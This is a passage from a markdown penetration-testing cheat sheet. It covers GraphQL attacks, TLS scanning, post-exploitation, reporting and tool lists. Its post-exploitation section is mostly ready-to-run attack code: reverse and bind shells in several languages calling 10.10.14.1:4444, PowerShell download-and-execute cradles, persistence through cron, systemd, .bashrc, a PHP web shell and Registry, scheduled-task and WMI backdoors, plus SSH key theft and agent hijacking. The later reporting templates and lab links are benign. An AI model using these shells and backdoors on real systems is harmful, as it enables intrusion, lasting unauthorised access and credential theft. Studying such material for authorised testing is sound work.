}\n}\n```\n\n#### Query Examples\n```graphql\n# Basic query\n{\n  user(id: 1) {\n    name\n    email\n    posts {\n      title\n    }\n  }\n}\n\n# Mutation\nmutation {\n  createUser(input: {name: \"test\", email: \"test@test.com\"}) {\n    id\n    name\n  }\n}\n\n# Fragments\nfragment UserFields on User {\n  id\n  name\n  email\n}\n\nquery {\n  user(id: 1) {\n    ...UserFields\n  }\n}\n\n# Aliases\n{\n  user1: user(id: 1) {\n    name\n  }\n  user2: user(id: 2) {\n    name\n  }\n}\n```\n\n#### GraphQL Attacks\n```graphql\n# Deep nested query (DoS)\nquery {\n  user(id: 1) {\n    posts {\n      comments {\n        user {\n          posts {\n            comments {\n              user {\n                posts {\n                  title\n                }\n              }\n            }\n          }\n        }\n      }\n    }\n  }\n}\n\n# Alias-based attack\nquery {\n  a: user(id: 1) { name }\n  b: user(id: 1) { name }\n  c: user(id: 1) { name }\n  # ... repeated many times\n}\n\n# Introspection abuse\nquery {\n  __schema {\n    types {\n      name\n      fields {\n        name\n        type {\n          name\n          fields {\n            name\n            type {\n              name\n            }\n          }\n        }\n      }\n    }\n  }\n}\n```\n\n### API Security Tools\n\n#### Postman/Newman\n```bash\n# Run collections\nnewman run collection.json -e environment.json\n\n# With data\nnewman run collection.json -d data.csv\n\n# HTML report\nnewman run collection.json -r htmlextra\n```\n\n#### OWASP ZAP API Scan\n```bash\n# API scan\nzap-api-scan.py -t https://target.com/swagger.json -f openapi\n\n# Active scan\nzap-api-scan.py -t https://target.com/swagger.json -f openapi -a\n```\n\n#### Kiterunner\n```bash\n# API endpoint discovery\nkr scan https://target.com -w /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt\n\n# Bruteforce with wordlist\nkr brute https://target.com -w /usr/share/seclists/Discovery/Web-Content/common.txt\n```\n\n---\n\n## SSL/TLS 
Security\n\n### SSL/TLS Scanning\n\n#### testssl.sh\n```bash\n# Basic scan\n./testssl.sh https://target.com\n\n# JSON output\n./testssl.sh --jsonfile results.json https://target.com\n\n# HTML report\n./testssl.sh --htmlfile report.html https://target.com\n\n# Check specific vulnerabilities\n./testssl.sh --heartbleed https://target.com\n./testssl.sh --poodle https://target.com\n./testssl.sh --freak https://target.com\n./testssl.sh --logjam https://target.com\n./testssl.sh --crime https://target.com\n./testssl.sh --breach https://target.com\n```\n\n#### sslyze\n```bash\n# Basic scan\nsslyze target.com\n\n# Check certificates\nsslyze --certinfo target.com\n\n# Check protocols\nsslyze --tlsv1 --tlsv1_1 --tlsv1_2 --tlsv1_3 target.com\n\n# Check vulnerabilities\nsslyze --heartbleed --robot --fallback target.com\n\n# JSON output\nsslyze --json_out=results.json target.com\n```\n\n#### sslscan\n```bash\n# Basic scan (enumerates supported cipher suites)\nsslscan target.com:443\n\n# Show certificate\nsslscan --show-certificate target.com\n\n# Certificate and protocol checks only (skip cipher suite enumeration)\nsslscan --no-ciphersuites target.com\n```\n\n### Manual SSL/TLS Checks\n\n```bash\n# OpenSSL connection\nopenssl s_client -connect target.com:443\nopenssl s_client -connect target.com:443 -tls1_2\nopenssl s_client -connect target.com:443 -cipher 'ECDHE-RSA-AES128-GCM-SHA256'\n\n# Certificate details\necho | openssl s_client -connect target.com:443 2>/dev/null | openssl x509 -text\n\n# Check expiration\necho | openssl s_client -connect target.com:443 2>/dev/null | openssl x509 -noout -dates\n\n# Check SAN\necho | openssl s_client -connect target.com:443 2>/dev/null | openssl x509 -noout -ext subjectAltName\n\n# Supported protocols\nnmap --script ssl-enum-ciphers -p 443 target.com\n```\n\n### Security Headers Check\n\n```bash\n# HSTS check\ncurl -sI https://target.com | grep -i \"strict-transport-security\"\n\n# CSP check\ncurl -sI https://target.com | grep -i \"content-security-policy\"\n\n# HPKP (deprecated)\ncurl -sI https://target.com | grep -i 
\"public-key-pins\"\n\n# Expect-CT\ncurl -sI https://target.com | grep -i \"expect-ct\"\n\n# Certificate Transparency\ncurl -s https://crt.sh/?q=target.com\n```\n\n### SSL/TLS Vulnerabilities\n\n```bash\n# Heartbleed (CVE-2014-0160)\nnmap -p 443 --script ssl-heartbleed target.com\n\n# POODLE (CVE-2014-3566)\nnmap -p 443 --script ssl-poodle target.com\n\n# FREAK (CVE-2015-0204): stock nmap has no ssl-freak script; look for RSA_EXPORT suites instead\nnmap -p 443 --script ssl-enum-ciphers target.com | grep -i export\n\n# DROWN (CVE-2016-0800): the nmap script is named sslv2-drown\nnmap -p 443 --script sslv2-drown target.com\n\n# ROBOT (CVE-2017-17382): stock nmap has no ssl-robot script; use testssl.sh\n./testssl.sh --robot https://target.com\n\n# BEAST (CVE-2011-3389)\n# Check if TLS 1.0 is enabled\n\n# CRIME (CVE-2012-4929)\n# Check compression\n\n# BREACH (CVE-2013-3587)\n# Check HTTP compression\n```\n\n---\n\n## Post-Exploitation\n\n### Reverse Shells\n\n#### Linux Reverse Shells\n```bash\n# Bash\nbash -i >& /dev/tcp/10.10.14.1/4444 0>&1\n\n# Python\npython -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.1\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"])'\n\n# PHP\nphp -r '$s=fsockopen(\"10.10.14.1\",4444);exec(\"/bin/sh -i <&3 >&3 2>&3\");'\n\n# Perl\nperl -e 'use Socket;$i=\"10.10.14.1\";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'\n\n# Ruby\nruby -rsocket -e'f=TCPSocket.open(\"10.10.14.1\",4444).to_i;exec sprintf(\"/bin/sh -i <&%d >&%d 2>&%d\",f,f,f)'\n\n# Netcat\nnc -e /bin/sh 10.10.14.1 4444\nrm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.1 4444 >/tmp/f\n\n# Telnet\nrm -f /tmp/p; mknod /tmp/p p && telnet 10.10.14.1 4444 0/tmp/p\n\n# XTerm\nxterm -display 10.10.14.1:1\n```\n\n#### Windows Reverse Shells\n```powershell\n# PowerShell\npowershell -NoP -NonI -W Hidden 
-Exec Bypass -Command \"IEX (New-Object System.Net.WebClient).DownloadString('http://10.10.14.1/ps.ps1')\"\n\n# PowerShell one-liner\npowershell -c \"$client = New-Object System.Net.Sockets.TCPClient('10.10.14.1',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\"\n\n# Netcat\nnc.exe 10.10.14.1 4444 -e cmd.exe\n\n# msfvenom\nmsfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f exe -o shell.exe\n\n# VB Script\n# Create reverse shell VBS script\n```\n\n### Bind Shells\n\n```bash\n# Linux\nnc -lvnp 4444 -e /bin/sh\npython -c 'exec(\"import socket, subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR, 1);s.bind((\\\"0.0.0.0\\\",4444));s.listen(1);c,a=s.accept();\\nwhile True: d=c.recv(1024); if len(d)==0: break; p=subprocess.Popen(d,shell=True,stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.PIPE); o=p.stdout.read()+p.stderr.read(); c.send(o)\")'\n\n# Windows\nnc.exe -lvnp 4444 -e cmd.exe\n```\n\n### TTY Upgrade\n\n```bash\n# Python\npython -c 'import pty; pty.spawn(\"/bin/bash\")'\npython3 -c 'import pty; pty.spawn(\"/bin/bash\")'\n\n# Script\nscript /dev/null -qc /bin/bash\n\n# Socat\nsocat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.14.1:4444\n\n# After getting shell, background (Ctrl+Z) and:\nstty raw -echo; fg\nexport TERM=xterm\nstty rows 40 cols 150\n```\n\n### Privilege Escalation\n\n#### Linux Enumeration\n```bash\n# System info\nuname -a\ncat /etc/os-release\ncat /etc/issue\nhostname\n\n# User info\nid\nwhoami\nsudo -l\ncat /etc/passwd\ncat /etc/shadow\nhistory\n\n# 
Process info\nps aux\nps -ef\ntop -n 1\n\n# Network info\nifconfig\nip a\nnetstat -an\nnetstat -tulpn\nss -tulpn\ncat /etc/hosts\n\n# File system\nfind / -perm -4000 2&gt;/dev/null   # SUID\nfind / -perm -2000 2&gt;/dev/null   # SGID\nfind / -writable -type f 2&gt;/dev/null | grep -v proc\nfind / -name \"*.key\" -o -name \"*.pem\" -o -name \"*.crt\" 2&gt;/dev/null\n\n# Cron jobs\ncat /etc/crontab\nls -la /etc/cron*\ngrep \"CRON\" /var/log/syslog\n\n# Installed software\ndpkg -l\nrpm -qa\npip list\ngem list\nnpm list -g\n\n# Environment variables\nenv\ncat ~/.bashrc\ncat ~/.bash_profile\n\n# Log files\ncat /var/log/auth.log\ncat /var/log/apache2/access.log\ncat /var/log/mysql/error.log\n\n# Config files\nfind / -name \"*.conf\" -o -name \"*.config\" 2&gt;/dev/null\n```\n\n#### Linux Privilege Escalation Tools\n```bash\n# LinPEAS\ncurl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh\n\n# LinEnum\nwget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh\nchmod +x LinEnum.sh\n./LinEnum.sh\n\n# Linux Exploit Suggester\nwget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh\nchmod +x linux-exploit-suggester.sh\n./linux-exploit-suggester.sh\n\n# pspy (process monitor)\nwget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64\nchmod +x pspy64\n./pspy64\n```\n\n#### Windows Enumeration\n```powershell\n# System info\nsysteminfo\nwmic os get caption,version,buildnumber\nwmic computersystem get domain,manufacturer,model,name\n\n# User info\nwhoami\nwhoami /priv\nwhoami /groups\nnet users\nnet localgroup administrators\n\n# Process info\ntasklist /v\nwmic process list full\n\n# Network info\nipconfig /all\nnetstat -an\nroute print\narp -a\n\n# File system\ndir C:\\\ndir \"C:\\Program Files\"\ndir \"C:\\Program Files (x86)\"\ndir C:\\Users\ndir /s *.config\ndir /s *.kdbx\ndir /s *.key\n\n# Services\nwmic service list brief\nsc query\nnet start\n\n# Installed 
software\n# (wmic product triggers an MSI consistency check of every package; the registry query is quieter)\nwmic product get name,version,vendor\nGet-ItemProperty HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* | Select-Object DisplayName, DisplayVersion, Publisher\ndir \"C:\\Program Files\"\nGet-ChildItem -Path \"C:\\Program Files\" -Recurse\n\n# Scheduled tasks\nschtasks /query /fo LIST /v\nGet-ScheduledTask\n\n# Registry\nreg query HKLM /f \"password\" /t REG_SZ /s\nreg query HKCU /f \"password\" /t REG_SZ /s\nreg query \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\"   # AutoAdminLogon / DefaultPassword\n```\n\n#### Windows Privilege Escalation Tools\n```powershell\n# In PowerShell, wget is an alias of Invoke-WebRequest and discards the body unless -OutFile is given.\n# All of these tools are flagged by Defender/AMSI on a default install.\n\n# WinPEAS\nInvoke-WebRequest -Uri https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASany.exe -OutFile winPEASany.exe\n.\\winPEASany.exe\n\n# PowerUp\nIEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1')\nInvoke-AllChecks\n\n# Sherlock (unmaintained; Watson by the same author covers newer builds)\nIEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/rasta-mouse/Sherlock/master/Sherlock.ps1')\nFind-AllVulns\n\n# Windows Exploit Suggester: run on the attacking machine against a saved `systeminfo` dump.\n# --update fetches the MS bulletin spreadsheet (named &lt;date&gt;-mssb.xls); Microsoft stopped publishing\n# it in 2017, so it only covers older hosts. wesng (wes.py --update; wes.py systeminfo.txt) covers current builds.\nInvoke-WebRequest -Uri https://raw.githubusercontent.com/AonCyberLabs/Windows-Exploit-Suggester/master/windows-exploit-suggester.py -OutFile windows-exploit-suggester.py\npython windows-exploit-suggester.py --update\npython windows-exploit-suggester.py --database 2024-01-01-mssb.xls --systeminfo sysinfo.txt\n```\n\n### Persistence\n\n#### Linux Persistence\n```bash\n# SSH key (sshd ignores authorized_keys if it or ~/.ssh is group/world writable)\nmkdir -p ~/.ssh &amp;&amp; chmod 700 ~/.ssh\necho \"ssh-rsa AAAAB3...\" &gt;&gt; ~/.ssh/authorized_keys\nchmod 600 ~/.ssh/authorized_keys\n\n# Cron job (append; 'crontab file' would replace the user's existing crontab)\n(crontab -l 2&gt;/dev/null; echo \"* * * * * /bin/bash -c 'bash -i &gt;&amp; /dev/tcp/10.10.14.1/4444 0&gt;&amp;1'\") | crontab -\n\n# Systemd service (root)\ncat &gt; /etc/systemd/system/persistence.service &lt;&lt; EOF\n[Unit]\nDescription=Persistence\n\n[Service]\nType=simple\nExecStart=/bin/bash -c 'bash -i &gt;&amp; /dev/tcp/10.10.14.1/4444 0&gt;&amp;1'\nRestart=always\nRestartSec=60\n\n[Install]\nWantedBy=multi-user.target\nEOF\n\nsystemctl enable persistence.service\nsystemctl start persistence.service\n\n# .bashrc (fires on every interactive shell of that user)\necho 'bash -i &gt;&amp; /dev/tcp/10.10.14.1/4444 0&gt;&amp;1 &amp;' &gt;&gt; ~/.bashrc\n\n# Web shell (minimal; remove it when the engagement ends)\necho '&lt;?php system($_GET[\"cmd\"]); ?&gt;' &gt; /var/www/html/shell.php\ncurl 'http://target.com/shell.php?cmd=id'\n```\n\n#### Windows Persistence\n```powershell\n# Registry\nNew-ItemProperty 
-Path \"HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"Backdoor\" -PropertyType String -Value \"C:\\shell.exe\"\n# (HKCU:\\...\\Run needs no admin rights but only fires for the current user)\n\n# Scheduled task (/ru SYSTEM requires an elevated shell)\nschtasks /create /tn \"Backdoor\" /tr \"C:\\shell.exe\" /sc onlogon /ru SYSTEM\n\n# Startup folder (%username% is cmd.exe syntax; PowerShell uses $env:APPDATA)\ncopy shell.exe \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\\"\n\n# WMI persistence: the filter and consumer do nothing until a __FilterToConsumerBinding links them\n$filter = ([wmiclass]\"\\\\.\\root\\subscription:__EventFilter\").CreateInstance()\n$filter.QueryLanguage = \"WQL\"\n$filter.Query = \"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'\"\n$filter.Name = \"Backdoor\"\n$filter.EventNamespace = 'root\\cimv2'\n$filterPath = $filter.Put()\n\n$consumer = ([wmiclass]\"\\\\.\\root\\subscription:CommandLineEventConsumer\").CreateInstance()\n$consumer.Name = 'BackdoorConsumer'\n$consumer.CommandLineTemplate = \"C:\\shell.exe\"\n$consumerPath = $consumer.Put()\n\n$binding = ([wmiclass]\"\\\\.\\root\\subscription:__FilterToConsumerBinding\").CreateInstance()\n$binding.Filter = $filterPath.Path\n$binding.Consumer = $consumerPath.Path\n$binding.Put()\n\n# Verify the subscription (defenders: the same query hunts for it)\nGet-WmiObject -Namespace root\\subscription -Class __FilterToConsumerBinding\n\n# Service (admin)\nsc.exe create Backdoor binPath= \"C:\\shell.exe\" start= auto\nsc.exe start Backdoor\n```\n\n### Lateral Movement\n\n#### SSH\n```bash\n# SSH key stealing (config and known_hosts show where the key is used)\nfind / -name \"id_rsa\" -o -name \"id_ed25519\" 2&gt;/dev/null\ncat ~/.ssh/id_rsa ~/.ssh/config ~/.ssh/known_hosts\n\n# SSH agent forwarding (-A exposes your agent to root on target.com; avoid it through hosts you do not trust)\nssh -A user@target.com\n# The same exposure in reverse: reuse an agent another user forwarded to this host (root or same uid)\nls -la /tmp/ssh-*/agent.*\nexport SSH_AUTH_SOCK=$(ls /tmp/ssh-*/agent.* | head -n 1)\nssh-add -l\n\n# SSH tunneling\nssh -L 8080:localhost:80 user@target.com    # Local forward\nssh -R 8080:localhost:80 user@target.com    # Remote forward\nssh -D 1080 user@target.com                  # Dynamic proxy\n```\n\n#### Windows Lateral Movement\n```powershell\n$cred = Get-Credential   # or: New-Object PSCredential('DOMAIN\\user', (ConvertTo-SecureString 'pass' -AsPlainText -Force))\n\n# PSExec\n.\\PsExec.exe \\\\target -u user -p pass cmd.exe\n\n# WinRM\nEnter-PSSession -ComputerName target -Credential $cred\nInvoke-Command -ComputerName target -ScriptBlock {whoami} -Credential $cred\n\n# WMI\nwmic /node:target /user:user /password:pass process call create \"cmd.exe\"\n\n# SMB\nnet use \\\\target\\c$ /user:user pass\ncopy shell.exe \\\\target\\c$\\Windows\\Temp\\\n```\n\n### Pivoting\n\n#### SSH Pivoting\n```bash\n# Local port forwarding\nssh -L 8080:internal-server:80 user@pivot-host\n\n# Remote port 
forwarding\nssh -R 8080:localhost:80 user@pivot-host\n\n# Dynamic SOCKS proxy\nssh -D 1080 user@pivot-host\n\n# SSH tunneling with ProxyCommand\nssh -o ProxyCommand=\"ssh -W %h:%p user@pivot-host\" target\n```\n\n#### SOCKS Proxies\n```bash\n# Using proxychains\necho \"socks4 127.0.0.1 1080\" &gt;&gt; /etc/proxychains.conf\nproxychains nmap -sT -Pn target\n\n# Using chisel\n# Server (attacker)\n./chisel server -p 8000 --reverse\n# Client (pivot)\n./chisel client attacker:8000 R:socks\n\n# Using EarthWorm\n./ew -s ssocksd -l 1080\n```\n\n#### Port Forwarding\n```bash\n# Linux\n# SSH forwarding\nssh -L 8080:localhost:80 user@pivot\n\n# Netcat forwarding\nmkfifo /tmp/fifo\nnc -l -p 8080 &lt; /tmp/fifo | nc target 80 &gt; /tmp/fifo\n\n# Socat forwarding\nsocat TCP-LISTEN:8080,fork TCP:target:80\n\n# Windows\n# netsh port forwarding\nnetsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=target\n```\n\n---\n\n## Reporting\n\n### Report Structure\n\n#### Executive Summary\n```\nEXECUTIVE SUMMARY\n=================\n- Overview of engagement\n- Key findings (high-level)\n- Risk ratings\n- Business impact\n- Strategic recommendations\n- Scope and methodology summary\n```\n\n#### Technical Details\n```\nTECHNICAL FINDINGS\n==================\nFinding #1: [Title]\n- Severity: Critical/High/Medium/Low/Info\n- CVSS Score: X.X (Vector: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n- CWE: CWE-89\n- CVE: CVE-2024-XXXX (if applicable)\n- Affected Component: /path/to/vulnerable/endpoint\n- Description: Detailed description of the vulnerability\n- Impact: What an attacker can achieve\n- Evidence: Proof of concept, screenshots, request/response\n- Remediation: How to fix the issue\n- References: Links to documentation, CVEs, etc.\n```\n\n#### Remediation Recommendations\n```\nREMEDIATION GUIDELINES\n======================\nShort-term fixes:\n1. [Immediate actions]\n\nLong-term solutions:\n1. 
[Architectural changes]\n\nSecurity controls to implement:\n1. [Preventive controls]\n2. [Detective controls]\n3. [Corrective controls]\n```\n\n### Reporting Tools\n\n#### Dradis Framework\n```bash\n# Install\ngem install dradis\n\n# Start\ndradis start\n\n# Web interface at https://localhost:3000\n```\n\n#### Serpico\n```bash\n# Install\ngit clone https://github.com/SerpicoProject/Serpico.git\ncd Serpico\nbundle install\nruby serpico.rb\n```\n\n#### Pwndoc\n```bash\n# Docker\ndocker run -p 4242:4242 pwndoc/pwndoc\n```\n\n### Report Templates\n\n#### Markdown Template\n```markdown\n# Penetration Test Report\n\n## 1. Executive Summary\n[1-2 paragraphs describing the engagement and key findings]\n\n**Total Findings:** X\n- Critical: X\n- High: X\n- Medium: X\n- Low: X\n- Informational: X\n\n## 2. Scope\n- In-scope: [domains, IP ranges, applications]\n- Out-of-scope: [excluded items]\n- Testing dates: [start date] to [end date]\n\n## 3. Methodology\n- Phase 1: Reconnaissance\n- Phase 2: Scanning &amp; Enumeration\n- Phase 3: Vulnerability Assessment\n- Phase 4: Exploitation\n- Phase 5: Post-Exploitation\n- Phase 6: Reporting\n\n## 4. Findings\n\n### 4.1 [Finding Title]\n**Severity:** Critical/High/Medium/Low/Info\n**CVSS:** X.X (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n**CWE:** CWE-89\n**Affected Component:** [URL/path]\n\n**Description:**\n[Detailed description]\n\n**Impact:**\n[What an attacker can achieve]\n\n**Evidence:**\n```\nRequest:\nGET /vulnerable.php?id=1' UNION SELECT 1,2,3--\n\nResponse:\n{\"id\":1,\"name\":\"admin\",\"email\":\"admin@localhost\"}\n```\n\n**Screenshot:**\n![Evidence](screenshots/finding1.png)\n\n**Remediation:**\n[Step-by-step fix]\n\n**References:**\n- [OWASP SQL Injection](https://owasp.org/www-community/attacks/SQL_Injection)\n- [CWE-89](https://cwe.mitre.org/data/definitions/89.html)\n\n## 5. 
Remediation Summary\n\n| Priority | Finding | Difficulty | Estimated Time |\n|----------|---------|------------|----------------|\n| Critical | SQL Injection | Medium | 2 hours |\n| High | XSS | Easy | 1 hour |\n| Medium | Missing HSTS | Easy | 30 minutes |\n\n## 6. Appendix\n- A. Tools Used\n- B. Wordlists\n- C. Raw Scan Results\n```\n\n#### Python Report Generator\n```python\n#!/usr/bin/env python3\n# report_generator.py\n\nimport json\nimport datetime\nfrom jinja2 import Template\n\nclass PentestReport:\n    def __init__(self, target, tester, date=None):\n        self.target = target\n        self.tester = tester\n        self.date = date or datetime.datetime.now().strftime(\"%Y-%m-%d\")\n        self.findings = []\n        self.scope = {}\n        self.summary = {}\n    \n    def add_finding(self, finding):\n        self.findings.append(finding)\n    \n    def generate_summary(self):\n        severity_counts = {\"critical\": 0, \"high\": 0, \"medium\": 0, \"low\": 0, \"info\": 0}\n        for f in self.findings:\n            severity_counts[f.get(\"severity\", \"info\").lower()] += 1\n        self.summary = severity_counts\n        return severity_counts\n    \n    def to_markdown(self):\n        template = Template(\"\"\"\n# Penetration Test Report: {{ target }}\n\n## Executive Summary\n**Date:** {{ date }}\n**Tester:** {{ tester }}\n\n### Summary of Findings\n- Critical: {{ summary.critical }}\n- High: {{ summary.high }}\n- Medium: {{ summary.medium }}\n- Low: {{ summary.low }}\n- Info: {{ summary.info }}\n\n## Findings\n{% for finding in findings %}\n### {{ loop.index }}. 
{{ finding.title }}\n**Severity:** {{ finding.severity }}\n**CVSS:** {{ finding.cvss }}\n**Affected:** {{ finding.affected }}\n\n**Description:**\n{{ finding.description }}\n\n**Impact:**\n{{ finding.impact }}\n\n**Evidence:**\n```\n{{ finding.evidence }}\n```\n\n**Remediation:**\n{{ finding.remediation }}\n\n**References:**\n{% for ref in finding.references %}\n- {{ ref }}\n{% endfor %}\n\n---\n{% endfor %}\n        \"\"\")\n        \n        self.generate_summary()\n        return template.render(\n            target=self.target,\n            tester=self.tester,\n            date=self.date,\n            summary=self.summary,\n            findings=self.findings\n        )\n    \n    def to_json(self):\n        self.generate_summary()\n        return json.dumps({\n            \"metadata\": {\n                \"target\": self.target,\n                \"tester\": self.tester,\n                \"date\": self.date\n            },\n            \"summary\": self.summary,\n            \"findings\": self.findings\n        }, indent=2)\n\n# Example usage\nif __name__ == \"__main__\":\n    report = PentestReport(\"target.com\", \"awjunaid\")\n    \n    report.add_finding({\n        \"title\": \"SQL Injection in Login\",\n        \"severity\": \"critical\",\n        \"cvss\": \"9.8\",\n        \"affected\": \"/login\",\n        \"description\": \"The username parameter is vulnerable to SQL injection...\",\n        \"impact\": \"Attacker can bypass authentication and access all user data\",\n        \"evidence\": \"username=admin' OR '1'='1'--\",\n        \"remediation\": \"Use parameterized queries\",\n        \"references\": [\"https://owasp.org/SQLi\"]\n    })\n    \n    with open(\"report.md\", \"w\") as f:\n        f.write(report.to_markdown())\n    \n    with open(\"report.json\", \"w\") as f:\n        f.write(report.to_json())\n```\n\n---\n\n## Tools Reference\n\n### Comprehensive Tool List\n\n#### Reconnaissance\n| Tool | Purpose | Command Example 
|\n|------|---------|-----------------|\n| **Amass** | Subdomain enumeration | `amass enum -d target.com` |\n| **Sublist3r** | Subdomain discovery | `sublist3r -d target.com` |\n| **theHarvester** | OSINT gathering | `theHarvester -d target.com -b all` |\n| **dnsrecon** | DNS enumeration | `dnsrecon -d target.com` |\n| **massdns** | High-performance DNS | `massdns -r lists/resolvers.txt -t A domains.txt` |\n| **shodan** | Internet device search | `shodan search hostname:target.com` |\n| **censys** | Certificate search | `censys search target.com` |\n\n#### Scanning\n| Tool | Purpose | Command Example |\n|------|---------|-----------------|\n| **Nmap** | Port scanning | `nmap -sV -sC target.com` |\n| **Masscan** | High-speed scanning (IP addresses only, no hostnames) | `masscan -p1-65535 --rate=10000 $(dig +short target.com)` |\n| **Rustscan** | Fast port scanner | `rustscan -a target.com` |\n| **Naabu** | Port scanning | `naabu -host target.com` |\n| **Httpx** | HTTP probing | `httpx -l hosts.txt -title -tech-detect` |\n\n#### Web Enumeration\n| Tool | Purpose | Command Example |\n|------|---------|-----------------|\n| **Gobuster** | Directory brute force | `gobuster dir -u http://target.com -w wordlist.txt` |\n| **FFUF** | Web fuzzing | `ffuf -u http://target.com/FUZZ -w wordlist.txt` |\n| **Dirb** | Directory scanner | `dirb http://target.com` |\n| **Wfuzz** | Web fuzzer | `wfuzz -c -z file,wordlist.txt http://target.com/FUZZ` |\n| **Nikto** | Web vulnerability scanner | `nikto -h target.com` |\n| **WhatWeb** | Technology detection | `whatweb target.com` |\n| **WPScan** | WordPress scanner | `wpscan --url target.com` |\n| **Joomscan** | Joomla scanner | `joomscan -u target.com` |\n| **Droopescan** | Drupal scanner | `droopescan scan drupal -u target.com` |\n\n#### Vulnerability Assessment\n| Tool | Purpose | Command Example |\n|------|---------|-----------------|\n| **Nuclei** | Template-based scanner | `nuclei -u target.com` |\n| **OpenVAS** | Vulnerability scanner | `gvm-start` |\n| **Nessus** | Commercial scanner | `nessuscli 
scan new` |\n| **Wapiti** | Web vulnerability scanner | `wapiti -u https://target.com` |\n| **Arachni** | Web scanner | `arachni https://target.com` |\n\n#### Exploitation\n| Tool | Purpose | Command Example |\n|------|---------|-----------------|\n| **Metasploit** | Exploitation framework | `msfconsole` |\n| **SQLmap** | SQL injection | `sqlmap -u target.com?id=1` |\n| **Commix** | Command injection | `commix -u target.com?cmd=test` |\n| **BeEF** | Browser exploitation | `beef` |\n| **XSStrike** | XSS scanner | `xsstrike -u target.com?q=test` |\n| **Dalfox** | XSS scanner | `dalfox url target.com?p=test` |\n\n#### Password Attacks\n| Tool | Purpose | Command Example |\n|------|---------|-----------------|\n| **Hydra** | Online brute force | `hydra -l admin -P pass.txt target.com http-post-form` |\n| **Medusa** | Parallel brute force | `medusa -h target.com -U users.txt -P pass.txt -M http` |\n| **John** | Offline password cracker | `john --wordlist=rockyou.txt hash.txt` |\n| **Hashcat** | GPU password cracker | `hashcat -m 0 -a 0 hash.txt rockyou.txt` |\n| **CeWL** | Custom wordlist generator | `cewl https://target.com -w wordlist.txt` |\n\n#### Post-Exploitation\n| Tool | Purpose | Command Example |\n|------|---------|-----------------|\n| **LinPEAS** | Linux privilege escalation | `./linpeas.sh` |\n| **WinPEAS** | Windows privilege escalation | `.\\winPEAS.exe` |\n| **Impacket** | Network protocols | `psexec.py user:pass@target` |\n| **Mimikatz** | Credential dumping | `mimikatz.exe` |\n| **BloodHound** | Active Directory mapping | `bloodhound-python -u user -p pass -d domain.local` |\n\n#### Proxies &amp; Interception\n| Tool | Purpose | Command Example |\n|------|---------|-----------------|\n| **Burp Suite** | Web proxy | Start from Applications menu |\n| **ZAP** | Web proxy | `zaproxy` |\n| **Mitmproxy** | CLI proxy | `mitmproxy` |\n| **Proxychains** | Proxy chaining | `proxychains nmap target.com` |\n\n#### Wordlists\n| Wordlist | Location | Description 
|\n|----------|----------|-------------|\n| **rockyou.txt** | `/usr/share/wordlists/rockyou.txt` | Common passwords |\n| **SecLists** | `/usr/share/seclists` | Comprehensive wordlists |\n| **dirb common** | `/usr/share/wordlists/dirb/common.txt` | Common directories |\n| **dirbuster** | `/usr/share/wordlists/dirbuster` | Directory lists |\n| **fuzzdb** | `/usr/share/fuzzdb` | Attack payloads |\n\n---\n\n## Practice Labs &amp; Resources\n\n### Online Platforms\n\n#### Free Labs\n| Platform | URL | Description |\n|----------|-----|-------------|\n| **PortSwigger Web Security Academy** | https://portswigger.net/web-security | Free XSS, SQLi, SSRF labs |\n| **OWASP WebGoat** | https://github.com/WebGoat/WebGoat | Vulnerable web app |\n| **OWASP Juice Shop** | https://github.com/juice-shop/juice-shop | Modern vulnerable app |\n| **DVWA** | http://www.dvwa.co.uk/ | Damn Vulnerable Web App |\n| **bWAPP** | http://www.itsecgames.com/ | Buggy web app |\n| **Mutillidae** | https://github.com/webpwnized/mutillidae | OWASP Mutillidae II |\n\n#### Paid/Subscription Labs\n| Platform | URL | Description |\n|----------|-----|-------------|\n| **HackTheBox** | https://www.hackthebox.com | Realistic machines |\n| **TryHackMe** | https://tryhackme.com | Guided learning |\n| **PentesterLab** | https://pentesterlab.com | Hands-on exercises |\n| **PentesterAcademy** | https://www.pentesteracademy.com | Video courses |\n| **Offensive Security Proving Grounds** | https://www.offensive-security.com/labs/ | OSCP practice 